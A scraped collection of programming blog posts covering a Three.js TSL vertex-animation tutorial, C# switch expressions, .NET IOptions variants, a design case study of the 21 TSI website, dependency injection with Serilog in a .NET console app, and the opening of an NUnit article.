    // Friction controls the damping, so the movement doesn’t oscillate endlessly
    velocity *= friction;
    
    current_value += velocity;

    But before that, we need to store one more value per vertex, the velocity, so let’s create another storage buffer.

    const position_storage_at = storage(new THREE.StorageBufferAttribute(count, 3), "vec3", count);
    
    // New buffer for velocity
    const velocity_storage_at = storage(new THREE.StorageBufferAttribute(count, 3), "vec3", count);
    
    const compute_init = Fn(() => {
    
        position_storage_at.element(instanceIndex).assign(initial_position.element(instanceIndex));
        
        // We initialize it too
        velocity_storage_at.element(instanceIndex).assign(vec3(0.0, 0.0, 0.0));
    
    })().compute(count);

    We’ll also add two uniforms: spring and friction.

    const u_spring = uniform(0.05);
    const u_friction = uniform(0.9);

    Now we’ve implemented the springs in the update:

    const compute_update = Fn(() => {
    
        const base_position = initial_position.element(instanceIndex);
        const current_position = position_storage_at.element(instanceIndex);
    
        // Get current velocity
        const current_velocity = velocity_storage_at.element(instanceIndex);
    
        const normal = normal_at.element(instanceIndex);
    
        const   distance =  length(u_input_pos.sub(base_position));
        const   pointer_influence = step(distance,0.5).mul(1.5);
    
        const disorted_pos = base_position.add(normal.mul(pointer_influence));
        disorted_pos.assign((mix(base_position, disorted_pos, u_input_pos_press)));
      
        // Spring implementation
        // velocity += (target_value - current_value) * spring;
        current_velocity.addAssign(disorted_pos.sub(current_position).mul(u_spring));
        // velocity *= friction;
        current_velocity.assign(current_velocity.mul(u_friction));
        // value += velocity
        current_position.addAssign(current_velocity);
    
    
    })().compute(count);

    Now we’ve got everything we need — time to start fine-tuning.

    We’re going to add two things. First, we’ll use the TSL function mx_noise_vec3 to generate some noise for each vertex. That way, we can tweak the direction a bit so things don’t feel so stiff.

    We’re also going to rotate the vertices using another TSL function — surprise, it’s called rotate.

    Here’s what our updated compute_update function looks like:

    const compute_update = Fn(() => {
    
        const base_position = initial_position.element(instanceIndex);
        const current_position = position_storage_at.element(instanceIndex);
        const current_velocity = velocity_storage_at.element(instanceIndex);
    
        const normal = normal_at.element(instanceIndex);
    
        // NEW: Add noise so the direction in which the vertices "explode" isn’t too perfectly aligned with the normal
        const noise = mx_noise_vec3(current_position.mul(0.5).add(vec3(0.0, time, 0.0)), 1.0).mul(u_noise_amp);
    
        const distance = length(u_input_pos.sub(base_position));
        const pointer_influence = step(distance, 0.5).mul(1.5);
    
        const disorted_pos = base_position.add(noise.mul(normal.mul(pointer_influence)));
    
        // NEW: Rotate the vertices to give the animation a more chaotic feel
        disorted_pos.assign(rotate(disorted_pos, vec3(normal.mul(distance)).mul(pointer_influence)));
    
        disorted_pos.assign(mix(base_position, disorted_pos, u_input_pos_press));
    
        current_velocity.addAssign(disorted_pos.sub(current_position).mul(u_spring));
        current_position.addAssign(current_velocity);
        current_velocity.assign(current_velocity.mul(u_friction));
    
    })().compute(count);
    

    Now that the motion feels right, it’s time to tweak the material colors a bit and add some post-processing to the scene.

    We’re going to work on the emissive color — meaning it won’t be affected by lights, and it’ll always look bright and explosive. Especially once we throw some bloom on top. (Yes, bloom everything.)

    We’ll start from a base color (whichever you like), passed in as a uniform. To make sure each vertex gets a slightly different color, we’ll offset its hue a bit using values from the buffers — in this case, the velocity buffer.

    The hue function takes a color and a value to shift its hue, kind of like how offsetHSL works in THREE.Color.

    // Base emissive color
    const emissive_color = color(new THREE.Color("0000ff"));
    
    const vel_at = velocity_storage_at.toAttribute();
    const hue_rotated = vel_at.mul(Math.PI*10.0);
    
    // Multiply by the length of the velocity buffer — this means the more movement,
    // the more the vertex color will shift
    const emission_factor = length(vel_at).mul(10.0);
    
    // Assign the color to the emissive node and boost it as much as you want
    mesh.material.emissiveNode = hue(emissive_color, hue_rotated).mul(emission_factor).mul(5.0);

    Finally! Lets change scene background color and add Fog:

    scene.fog = new THREE.Fog(new THREE.Color("#41444c"),0.0,8.5);
    scene.background = scene.fog.color;

    Now, let’s spice up the scene with a bit of post-processing — one of those things that got way easier to implement thanks to TSL.

    We’re going to include three effects: ambient occlusion, bloom, and noise. I always like adding some noise to what I do — it helps break up the flatness of the pixels a bit.

    I won’t go too deep into this part — I grabbed the AO setup from the Three.js examples.

    const   composer = new THREE.PostProcessing(renderer);
    const   scene_pass = pass(scene,camera);
    
    scene_pass.setMRT(mrt({
        output:output,
        normal:normalView
    }));
    
    const   scene_color = scene_pass.getTextureNode("output");
    const   scene_depth = scene_pass.getTextureNode("depth");
    const   scene_normal = scene_pass.getTextureNode("normal");
    
    const ao_pass = ao( scene_depth, scene_normal, camera);
    ao_pass.resolutionScale = 1.0;
    
    const   ao_denoise = denoise(ao_pass.getTextureNode(), scene_depth, scene_normal, camera ).mul(scene_color);
    const   bloom_pass = bloom(ao_denoise,0.3,0.2,0.1);
    const   post_noise = (mx_noise_float(vec3(uv(),time.mul(0.1)).mul(sizes.width),0.03)).mul(1.0);
    
    composer.outputNode = ao_denoise.add(bloom_pass).add(post_noise);

    Alright, that’s it amigas — thanks so much for reading, and I hope it was useful!



    Source link

  • Advanced Switch Expressions and Switch Statements using filters &vert; Code4IT

    Advanced Switch Expressions and Switch Statements using filters | Code4IT


    We all use switch statements in our code. Do you use them at their full potential?

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    We all use switch statements in our code: they are a helpful way to run different code paths based on an check on a variable.

    In this short article, we’re gonna learn different ways to write switch blocks, and some nice tricks to create clean and easy-to-read filters on such statements.

    For the sake of this example, we will use a dummy hierarchy of types: a base User record with three subtypes: Player, Gamer, and Dancer.

    public abstract record User(int Age);
    
    public record Player(int Age, string Sport) : User(Age);
    
    public record Gamer(int Age, string Console) : User(Age);
    
    public record Dancer(int Age, string Dance) : User(Age);
    

    Let’s see different usages of switch statements and switch expressions.

    Switch statements

    Switch statements are those with the standard switch (something) block. They allow for different executions of paths, acting as a list of ifelse if blocks.

    They can be used to return a value, but it’s not mandatory: you can simply use switch statements to execute code that does not return any value.

    Switch statements with checks on the type

    The most simple example we can have is the plain check on the type.

    User user = new Gamer(30, "Nintendo Switch");
    
    string message = "";
    
    switch (user)
    {
        case Gamer:
        {
            message = "I'm a gamer";
            break;
        }
        case Player:
        {
            message = "I'm a player";
            break;
        }
        default:
        {
            message = "My type is not handled!";
            break;
        }
    }
    
    Console.WriteLine(message); // I'm a player
    

    Here we execute a different path based on the value the user variable has at runtime.

    We can also have an automatic casting to the actual type, and then use the runtime data within the case block:

    User user = new Gamer(30, "Nintendo Switch");
    
    string message = "";
    
    switch (user)
    {
        case Gamer g:
        {
            message = "I'm a gamer, and I have a " + g.Console;
            break;
        }
        case Player:
        {
            message = "I'm a player";
            break;
        }
        default:
        {
            message = "My type is not handled!";
            break;
        }
    }
    
    Console.WriteLine(message); //I'm a gamer, and I have a Nintendo Switch
    

    As you can see, since user is a Gamer, within the related branch we cast the user to Gamer in a variable named g, so that we can use its public properties and methods.

    Filtering using the WHEN keyword

    We can add additional filters on the actual value of the variable by using the when clause:

    User user = new Gamer(3, "Nintendo");
    
    string message = "";
    
    switch (user)
    {
        case Gamer g when g.Age < 10:
        {
            message = "I'm a gamer, but too young";
            break;
        }
        case Gamer g:
        {
            message = "I'm a gamer, and I have a " + g.Console;
            break;
        }
        case Player:
        {
            message = "I'm a player";
            break;
        }
        default:
        {
            message = "My type is not handled!";
            break;
        }
    }
    
    Console.WriteLine(message); // I'm a gamer, but too young
    

    Here we have the when g.Age < 10 filter applied to the Gamer g variable.

    Clearly, if we set the age to 30, we will see I’m a gamer, and I have a Nintendo Switch.

    Switch Expression

    Switch expressions act like Switch Statements, but they return a value that can be assigned to a variable or, in general, used immediately.

    They look like a lightweight, inline version of Switch Statements, and have a slightly different syntax.

    To reach the same result we saw before, we can write:

    User user = new Gamer(30, "Nintendo Switch");
    
    string message = user switch
    {
        Gamer g => "I'm a gamer, and I have a " + g.Console,
        Player => "I'm a player",
        _ => "My type is not handled!"
    };
    
    Console.WriteLine(message);
    

    By looking at the syntax, we can notice a few things:

    • instead of having switch(variable_name){}, we now have variable_name switch {};
    • we use the arrow notation => to define the cases;
    • we don’t have the default keyword, but we use the discard value _.

    When keyword vs Property Pattern in Switch Expressions

    Similarly, we can use the when keyword to define better filters on the cases.

    string message = user switch
    {
        Gamer gg when gg.Age < 10 => "I'm a gamer, but too young",
        Gamer g => "I'm a gamer, and I have a " + g.Console,
        Player => "I'm a player",
        _ => "My type is not handled!"
    };
    

    You can finally use a slightly different syntax to achieve the same result. Instead of using when gg.Age < 10 you can write Gamer { Age: < 10 }. This is called Property Pattern

    string message = user switch
    {
        Gamer { Age: < 10 } => "I'm a gamer, but too young",
        Gamer g => "I'm a gamer, and I have a " + g.Console,
        Player => "I'm a player",
        _ => "My type is not handled!"
    };
    

    Further readings

    We actually just scratched the surface of all the functionalities provided by the C# language.

    First of all, you can learn more about how to use Relational Patterns in a switch expression.

    To have a taste of it, here’s a short example:

    string Classify(double measurement) => measurement switch
    {
        < -4.0 => "Too low",
        > 10.0 => "Too high",
        double.NaN => "Unknown",
        _ => "Acceptable",
    };
    

    but you can read more here:

    🔗 Relational patterns | Microsoft Docs

    This article first appeared on Code4IT 🐧

    There are also more ways to handle Switch Statements. To learn about more complex examples, here’s the documentation:

    🔗 The switch statement | Microsoft Docs

    Finally, in those examples, we used records. As you saw, I marked the User type as abstract.

    Do you want to learn more about Records?

    🔗 8 things about Records in C# you probably didn’t know | Code4IT

    Wrapping up

    Learning about tools and approaches is useful, but you should also stay up-to-date with language features.

    Switch blocks had a great evolution over time, making our code more concise and distraction-free.

    I hope you enjoyed this article! Let’s keep in touch on Twitter or LinkedIn! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Understanding IOptions, IOptionsMonitor, and IOptionsSnapshot in .NET 7 &vert; Code4IT

    Understanding IOptions, IOptionsMonitor, and IOptionsSnapshot in .NET 7 | Code4IT


    There are several ways to handle configurations in a .NET Application. In this article, we’re going to learn how to use IOptions<T>, IOptionsSnapshot<T>, and IOptionsMonitor<T>

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    When dealing with configurations in a .NET application, we can choose different strategies. For example, you can simply inject an IConfiguration instance in your constructor, and retrieve every value by name.

    Or you can get the best out of Strongly Typed Configurations – you won’t have to care about casting those values manually because everything is already done for you by .NET.

    In this article, we are going to learn about IOptions, IOptionsSnapshot, and IOptionsMonitor. They look similar, but there are some key differences that you need to understand to pick the right one.

    For the sake of this article, I’ve created a dummy .NET API that exposes only one endpoint.

    In my appsettings.json file, I added a node:

    {
      "MyConfig": {
        "Name": "Davide"
      }
    }
    

    that will be mapped to a POCO class:

    public class GeneralConfig
    {
        public string Name { get; set; }
    }
    

    To add it to the API project, we can add this line to the Program.cs file:

    builder.Services.Configure<GeneralConfig>(builder.Configuration.GetSection("MyConfig"));
    

    As you can see, it takes the content with the name “MyConfig” and maps it to an object of type GeneralConfig.

    To test such types, I’ve created a set of dummy API Controllers. Each Controller exposes one single method, Get(), that reads the value from the configuration and returns it in an object.

    We are going to inject IOptions, IOptionsSnapshot, and IOptionsMonitor into the constructor of the related Controllers so that we can try the different approaches.

    IOptions: Simple, Singleton, doesn’t support config reloads

    IOptions<T> is the most simple way to inject such configurations. We can inject it into our constructors and access the actual value using the Value property:

    private readonly GeneralConfig _config;
    
    public TestingController(IOptions<GeneralConfig> config)
    {
        _config = config.Value;
    }
    

    Now we have direct access to the GeneralConfig object, with the values populated as we defined in the appsettings.json file.

    There are a few things to consider when using IOptions<T>:

    • This service is injected as a Singleton instance: the whole application uses the same instance, and it is valid throughout the whole application lifetime.
    • all the configurations are read at startup time. Even if you update the appsettings file while the application is running, you won’t see the values updated.

    Some people prefer to store the IOptions<T> instance as a private field, and access the value when needed using the Value property, like this:

    private readonly IOptions<GeneralConfig> _config;
    private int updates = 0;
    
    public TestingController(IOptions<GeneralConfig> config)
    {
        _config = config;
    }
    
    [HttpGet]
    public ActionResult<Result> Get()
    {
        var name = _config.Value.Name;
        return new Result
        {
            MyName = name,
            Updates = updates
        };
    }
    

    It works, but it’s useless: since IOptions<T> is a Singleton, we don’t need to access the Value property every time. It won’t change over time, and accessing it every single time is a useless operation. We can use the former approach: it’s easier to write and (just a bit) more performant.

    One more thing.
    When writing Unit Tests, we can inject an IOptions<T> in the system under test using a static method, Options.Create<T>, and pass it an instance of the required type.

    [SetUp]
    public void Setup()
    {
        var config = new GeneralConfig { Name = "Test" };
    
        var options = Options.Create(config);
    
        _sut = new TestingController(options);
    }
    

    Demo: the configuration does not change at runtime

    Below you can find a GIF that shows that the configurations do not change when the application is running.

    With IOptions the configuration does not change at runtime

    As you can see, I performed the following steps:

    1. start the application
    2. call the /TestingIOptions endpoint: it returns the name Davide
    3. now I update the content of the appsettings.json file, setting the name to Davide Bellone.
    4. when I call again the same endpoint, I don’t see the updated value.

    IOptionsSnapshot: Scoped, less-performant, supports config reload

    Similar to IOptions<T> we have IOptionsSnapshot<T>. They work similarly, but there is a huge difference: IOptionsSnapshot<T> is recomputed at every request.

    public TestingController(IOptionsSnapshot<GeneralConfig> config)
    {
        _config = config.Value;
    }
    

    With IOptionsSnapshot<T> you have always the most updated values: this service is injected with a Scoped lifetime, meaning that the values are read from configuration at every HTTP request. This also means that you can update the settings values while the application is running, and you’ll be able to see the updated results.

    Since .NET rebuilds the configurations at every HTTP call, there is a slight performance overhead. So, if not necessary, always use IOptions<T>.

    There is no way to test an IOptionsSnapshot<T> as we did with IOptions<T>, so you have to use stubs or mocks (maybe with Moq or NSubstitute 🔗).

    Demo: the configuration changes while the application is running

    Look at the GIF below: here I run the application and call the /TestingIOptionsSnapshot endpoint.

    With IOptionsSnapshot the configuration changes while the application is running

    I performed the following steps:

    1. run the application
    2. call the /TestingIOptionsSnapshot endpoint. The returned value is the same on the appsettings.json file: Davide Bellone.
    3. I then update the value on the configuration file
    4. when calling again /TestingIOptionsSnapshot, I can see that the returned value reflects the new value in the appsettings file.

    IOptionsMonitor: Complex, Singleton, supports config reload

    Finally, the last one of the trio: IOptionsMonitor<T>.

    Using IOptionsMonitor<T> you can have the most updated value on the appsettings.json file.

    We also have a callback event that is triggered every time the configuration file is updated.

    It’s injected as a Singleton service, so the same instance is shared across the whole application lifetime.

    There are two main differences with IOptions<T>:

    1. the name of the property that stores the config value is CurrentValue instead of Value;
    2. there is a callback that is called every time you update the settings file: OnChange(Action<TOptions, string?> listener). You can use it to perform operations that must be triggered every time the configuration changes.

    Note: OnChange returns an object that implements IDisposable that you need to dispose. Otherwise, as Chris Elbert noticed (ps: follow him on Twitter!) , the instance of the class that uses IOptionsMonitor<T> will never be disposed.

    Again, there is no way to test an IOptionsMonitor<T> as we did with IOptions<T>. So you should rely on stubs and mocks (again, maybe with Moq or NSubstitute 🔗).

    Demo: the configuration changes, and the callback is called

    In the GIF below I demonstrate the usage of IOptionsMonitor.

    I created an API controller that listens to changes in the configuration, updates a static counter, and returns the final result from the API:

    public class TestingIOptionsMonitorController : ControllerBase
    {
        private static int updates = 0;
        private readonly GeneralConfig _config;
    
        public TestingIOptionsMonitorController(IOptionsMonitor<GeneralConfig> config)
        {
            _config = config.CurrentValue;
            config.OnChange((_, _) => updates++);
        }
    
        [HttpGet]
        public ActionResult<Result> Get() => new Result
        {
            MyName = _config.Name,
            Updates = updates
        };
    }
    

    By running it and modifying the config content while the application is up and running, you can see the full usage of IOptionsMonitor<T>:

    With IOptionsMonitor the configuration changes, the callback is called

    As you can see, I performed these steps:

    1. run the application
    2. call the /TestionIOptionsMonitor endpoint. The MyName field is read from config, and Updates is 0;
    3. I then update and save the config file. In the background, the OnChange callback is fired, and the Updates value is updated;

    Oddly, the callback is called more times than expected. I updated the file only twice, but the counter is set to 6. That’s weird behavior. If you know why it happens, drop a message below 📩

    IOptions vs IOptionsSnapshot vs IOptionsMonitor in .NET

    We’ve seen a short introduction to IOptions, IOptionsSnapshot, and IOptionsMonitor.

    There are some differences, of course. Here’s a table with a recap of what we learned from this article.

    Type DI Lifetime Best way to inject in unit tests Allows live reload Has callback function
    IOptions<T> Singleton Options.Create<T>
    IOptionsSnapshot<T> Scoped Stub / Mock 🟢
    IOptionsMonitor<T> Singleton Stub / Mock 🟢 🟢

    There’s actually more: for example, with IOptionsSnapshot and IOptionsMonitor you can use named options, so that you can inject more instances of the same type that refer to different nodes in the JSON file.

    But that will be the topic for a future article, so stay tuned 😎

    Further readings

    There is a lot more about how to inject configurations.

    For sure, one of the best resources is the official documentation:

    🔗 Options pattern in ASP.NET Core | Microsoft docs

    I insisted on explaining that IOptions and IOptionsMonitor are Singleton, while IOptionsSnapshot is Scoped.
    If you don’t know what they mean, here’s a short but thorough explanation:

    🔗 Dependency Injection lifetimes in .NET | Code4IT

    In particular, I want you to focus on the Bonus tip, where I explain the problems of having Transient or Scoped services injected into a Singleton service:

    🔗Bonus tip: Transient dependency inside a Singleton | Code4IT

    This article first appeared on Code4IT 🐧

    In this article, I stored my configurations in an appsettings.json file. There are more ways to set configuration values – for example, Environment Variables and launchSettings.json.

    🔗 3 (and more) ways to set configuration values in .NET | Code4IT

    Wrapping up

    In this article, we learned how to use IOptions<T>, IOptionsSnapshot<T>, and IOptionsMonitor<T> in a .NET 7 application.

    There are many other ways to handle configurations: for instance, you can simply inject the whole object as a singleton, or use IConfiguration to get single values.

    When would you choose an approach instead of another? Drop a comment below! 📩

    I hope you enjoyed this article! Let’s keep in touch on Twitter or LinkedIn! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Beyond the Corporate Mold: How 21 TSI Sets the Future of Sports in Motion

    Beyond the Corporate Mold: How 21 TSI Sets the Future of Sports in Motion



    21 TSI isn’t your typical sports holding company. Overseeing a portfolio of brands in the sports equipment space, the team set out to break from the mold of the standard corporate website. Instead, they envisioned a digital experience that would reflect their DNA—where innovation, design, and technology converge into a rich, immersive journey.

    The result is a site that goes beyond static content, inviting users to explore through motion, interactivity, and meticulously crafted visuals. Developed through a close collaboration between type8 Studio and DEPARTMENT Maison de Création, the project pushes creative and technical boundaries to deliver a seamless, engaging experience.

    Concept & Art Direction

    The creative direction led by Paul Barbin played a crucial role in shaping the website’s identity. The design embraces a minimalist yet bold aesthetic—strictly monochromatic, anchored by a precise and structured typographic system. The layout is intentionally clean, but the experience stays dynamic thanks to well-orchestrated WebGL animations and subtle interactions.

    Grid & Style

    The definition of the grid played a fundamental role in structuring and clarifying the brand’s message. More than just a layout tool, the grid became a strategic framework—guiding content organization, enhancing readability, and ensuring visual consistency across all touchpoints.

    We chose an approach inspired by the Swiss style, also known as the International Typographic Style, celebrated for its clarity, precision, and restraint. This choice reflects our commitment to clear, direct, and functional communication, with a strong focus on user experience. The grid allows each message to be delivered with intention, striking a subtle balance between aesthetics and efficiency.

    A unique aspect of the project was the integration of AI-generated imagery. These visuals were thoughtfully curated and refined to align with the brand’s futuristic and enigmatic identity, further reinforcing the immersive nature of the website.

    Interaction & Motion Design

    The experience of 21 TSI is deeply rooted in movement. The site feels alive—constantly shifting and morphing in response to user interactions. Every detail works together to evoke a sense of fluidity:

    • WebGL animations add depth and dimension, making the site feel tactile and immersive.
    • Morphing transitions enable smooth navigation between sections, avoiding abrupt visual breaks.
    • Cursor distortion effects introduce a subtle layer of interactivity, letting users influence their journey through motion.
    • Scroll-based animations strike a careful balance between engagement and clarity, ensuring motion enhances the experience without overwhelming it.

    This dynamic approach creates a browsing experience that feels both organic and responsive—keeping users engaged without ever overwhelming them.

    Technical Implementation & Motion Design

    For this project, we chose a technology stack designed to deliver high performance and smooth interactions, all while maintaining the flexibility needed for creative exploration:

    • OGL: A lightweight alternative to Three.js, used for WebGL-powered animations and visual effects.
    • Anime.js: Handles motion design elements and precise animation timing.
    • Locomotive Scroll: Enables smooth, controlled scroll behavior throughout the site.
    • Eleventy (11ty): A static site generator that ensures fast load times and efficient content management.
    • Netlify: Provides seamless deployment and version control, keeping the development workflow agile.

    One of the key technical challenges was optimizing performance across devices while preserving the same fluid motion experience. Carefully balancing GPU-intensive WebGL elements with lightweight animations made seamless performance possible.

    Challenges & Solutions

    One of the primary challenges was ensuring that the high level of interactivity didn’t compromise usability. The team worked extensively to refine transitions so they felt natural, while keeping navigation intuitive. Balancing visual complexity with performance was equally critical—avoiding unnecessary elements while preserving a rich, engaging experience.

    Another challenge was the use of AI-generated visuals. While they introduced unique artistic possibilities, these assets required careful curation and refinement to align with the creative vision. Ensuring coherence between the AI-generated content and the designed elements was a meticulous process.

    Conclusion

    The 21 TSI website is a deep exploration of digital storytelling through design and interactivity. It captures the intersection of technology and aesthetics, offering an experience that goes well beyond a traditional corporate presence.

    The project was recognized with multiple awards, including Website of the Day on CSS Design Awards, FWA of the Day, and Awwwards, reinforcing its impact in the digital design space.

    This collaboration between type8 Studio and Paul Barbin of DEPARTMENT Maison de Création showcases how thoughtful design, innovative technology, and a strong artistic vision can come together to craft a truly immersive web experience.



    Source link

  • How to add Dependency Injection, Configurations, and Logging in a .NET 7 Console Application &vert; Code4IT

    How to add Dependency Injection, Configurations, and Logging in a .NET 7 Console Application | Code4IT


    By default, you cannot use Dependency Injection, custom logging, and configurations from settings in a Console Application. Unless you create a custom Host!

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    Sometimes, you just want to create a console application to run a complex script. Just because it is a “simple” console application, it doesn’t mean that you should not use best practices, such as using Dependency Injection.

    Also, you might want to test the code: Dependency Injection allows you to test the behavior of a class without having a strict dependency on the referenced concrete classes: you can use stubs and mocks, instead.

    In this article, we’re going to learn how to add Dependency Injection in a .NET 7 console application. The same approach can be used for other versions of .NET. We will also add logging, using Serilog, and configurations coming from an appsettings.json file.

    We’re going to start small, with the basic parts, and gradually move on to more complex scenarios. We’re gonna create a simple, silly console application: we will inject a bunch of services, and print a message on the console.

    We have a root class:

    public class NumberWorker
    {
        private readonly INumberService _service;
    
        public NumberWorker(INumberService service) => _service = service;
    
        public void PrintNumber()
        {
            var number = _service.GetPositiveNumber();
            Console.WriteLine($"My wonderful number is {number}");
        }
    }
    

    that injects an INumberService, implemented by NumberService:

    public interface INumberService
    {
        int GetPositiveNumber();
    }
    
    public class NumberService : INumberService
    {
        private readonly INumberRepository _repo;
    
        public NumberService(INumberRepository repo) => _repo = repo;
    
        public int GetPositiveNumber()
        {
            int number = _repo.GetNumber();
            return Math.Abs(number);
        }
    }
    

    which, in turn, uses an INumberRepository implemented by NumberRepository:

    public interface INumberRepository
    {
        int GetNumber();
    }
    
    public class NumberRepository : INumberRepository
    {
        public int GetNumber()
        {
            return -42;
        }
    }
    

    The console application will create a new instance of NumberWorker and call the PrintNumber method.

    Now, we have to build the dependency tree and inject such services.

    How to create an IHost to use a host for a Console Application

    The first step to take is to install some NuGet packages that will allow us to add a custom IHost container so that we can add Dependency Injection and all the customization we usually add in projects that have a StartUp (or a Program) class, such as .NET APIs.

    We need to install 2 NuGet packages: Microsoft.Extensions.Hosting.Abstractions and Microsoft.Extensions.Hosting will be used to create a new IHost that will be used to build the dependencies tree.

    By navigating your csproj file, you should be able to see something like this:

    <ItemGroup>
        <PackageReference Include="Microsoft.Extensions.Hosting" Version="7.0.1" />
        <PackageReference Include="Microsoft.Extensions.Hosting.Abstractions" Version="7.0.0" />
    </ItemGroup>
    

    Now we are ready to go! First, add the following using statements:

    using Microsoft.Extensions.DependencyInjection;
    using Microsoft.Extensions.Hosting;
    

    and then, within the Program class, add this method:

    private static IHost CreateHost() =>
      Host.CreateDefaultBuilder()
          .ConfigureServices((context, services) =>
          {
              services.AddSingleton<INumberRepository, NumberRepository>();
              services.AddSingleton<INumberService, NumberService>();
          })
          .Build();
    }
    

    Host.CreateDefaultBuilder() creates the default IHostBuilder – similar to the IWebHostBuilder, but without any reference to web components.

    Then we add all the dependencies, using services.AddSingleton<T, K>. Notice that it’s not necessary to add services.AddSingleton<NumberWorker>: when we will use the concrete instance, the dependency tree will be resolved, without the need of having an indication of the root itself.

    Finally, once we have everything in place, we call Build() to create a new instance of IHost.

    Now, we just have to run it!

    In the Main method, create the IHost instance by calling CreateHost(). Then, by using the ActivatorUtilities class (coming from the Microsoft.Externsions.DependencyInjection namespace), create a new instance of NumberWorker, so that you can call PrintNumber();

    private static void Main(string[] args)
    {
      IHost host = CreateHost();
      NumberWorker worker = ActivatorUtilities.CreateInstance<NumberWorker>(host.Services);
      worker.PrintNumber();
    }
    

    Now you are ready to run the application, and see the message on the console:

    Basic result on Console

    Read configurations from appsettings.json for a Console Library

    We want to make our system configurable and place our configurations in an appsettings.json file.

    As we saw in a recent article 🔗, we can use IOptions<T> to inject configurations in the constructor. For the sake of this article, I’m gonna use a POCO class, NumberConfig, that is mapped to a configuration section and injected into the classes.

    public class NumberConfig
    {
        public int DefaultNumber { get; set; }
    }
    

    Now we need to manually create an appsettings.json file within the project folder, and add a new section that will hold the values of the configuration:

    {
      "Number": {
        "DefaultNumber": -899
      }
    }
    

    and now we can add the configuration binding in our CreateHost() method, within the ConfigureServices section:

    services.Configure<NumberConfig>(context.Configuration.GetSection("Number"));
    

    Finally, we can update the NumberRepository to accept the configurations in input and use them to return the value:

    public class NumberRepository : INumberRepository
    {
        private readonly NumberConfig _config;
    
        public NumberRepository(IOptions<NumberConfig> options) => _config = options.Value;
    
        public int GetNumber() => _config.DefaultNumber;
    }
    

    Run the project to admire the result, and… BOOM! It will not work! You should see the message “My wonderful number is 0”, even though the number we set on the config file is -899.

    This happens because we must include the appsettings.json file in the result of the compilation. Right-click on that file, select the Properties menu, and set the “Copy to Output Directory” to “Copy always”:

    Copy always the appsettings file to the Output Directory

    Now, build and run the project, and you’ll see the correct message: “My wonderful number is 899”.

    Clearly, the same values can be accessed via IConfigurations.

    Add Serilog logging to log on Console and File

    Finally, we can add Serilog logs to our console applications – as well as define Sinks.

    To add Serilog, you first have to install these NuGet packages:

    • Serilog.Extensions.Hosting and Serilog.Formatting.Compact to add the basics of Serilog;
    • Serilog.Settings.Configuration to read logging configurations from settings (if needed);
    • Serilog.Sinks.Console and Serilog.Sinks.File to add the Console and the File System as Sinks.

    Let’s get back to the CreateHost() method, and add a new section right after ConfigureServices:

    .UseSerilog((context, services, configuration) => configuration
        .ReadFrom.Configuration(context.Configuration)
        .ReadFrom.Services(services)
        .Enrich.FromLogContext()
        .WriteTo.Console()
        .WriteTo.File($"report-{DateTimeOffset.UtcNow.ToString("yyyy-MM-dd-HH-mm-ss")}.txt", restrictedToMinimumLevel: LogEventLevel.Warning)
        )
    

    Here we’re telling that we need to read the config from Settings, add logging context, and write both on Console and on File (only if the log message level is greater or equal than Warning).

    Then, add an ILogger here and there, and admire the final result:

    Serilog Logging is visible on the Console

    Final result

    To wrap up, here’s the final implementation of the Program class and the
    CreateHost method:

    private static void Main(string[] args)
    {
        IHost host = CreateHost();
        NumberWorker worker = ActivatorUtilities.CreateInstance<NumberWorker>(host.Services);
        worker.PrintNumber();
    }
    
    private static IHost CreateHost() =>
      Host
      .CreateDefaultBuilder()
      .ConfigureServices((context, services) =>
      {
          services.Configure<NumberConfig>(context.Configuration.GetSection("Number"));
    
          services.AddSingleton<INumberRepository, NumberRepository>();
          services.AddSingleton<INumberService, NumberService>();
      })
      .UseSerilog((context, services, configuration) => configuration
          .ReadFrom.Configuration(context.Configuration)
          .ReadFrom.Services(services)
          .Enrich.FromLogContext()
          .WriteTo.Console()
          .WriteTo.File($"report-{DateTimeOffset.UtcNow.ToString("yyyy-MM-dd-HH-mm-ss")}.txt", restrictedToMinimumLevel: LogEventLevel.Warning)
          )
      .Build();
    

    Further readings

    As always, a few resources to learn more about the topics discussed in this article.

    First and foremost, have a look at this article with a full explanation of Generic Hosts in a .NET Core application:

    🔗 .NET Generic Host in ASP.NET Core | Microsoft docs

    Then, if you recall, we’ve already learned how to print Serilog logs to the Console:

    🔗 How to log to Console with .NET Core and Serilog | Code4IT

    This article first appeared on Code4IT 🐧

    Lastly, we accessed configurations using IOptions<NumberConfig>. Did you know that there are other ways to access config?

    🔗 Understanding IOptions, IOptionsMonitor, and IOptionsSnapshot in .NET 7 | Code4IT

    as well as defining configurations for your project?

    🔗 3 (and more) ways to set configuration values in .NET | Code4IT

    Wrapping up

    In this article, we’ve learned how we can customize a .NET Console application to use dependency injection, external configurations, and Serilog logging.

    I hope you enjoyed this article! Let’s keep in touch on Twitter or LinkedIn! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Use custom Equality comparers in Nunit tests &vert; Code4IT

    Use custom Equality comparers in Nunit tests | Code4IT


    When writing unit tests, there are smarter ways to check if two objects are equal than just comparing every field one by one.

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    When writing unit tests, you might want to check that the result returned by a method is equal to the one you’re expecting.

    [Test]
    public void Reverse_Should_BeCorrect()
    {
      string input = "hello";
      string result = MyUtils.Reverse(input);
    
      Assert.That(result, Is.EqualTo("olleh"));
    }
    

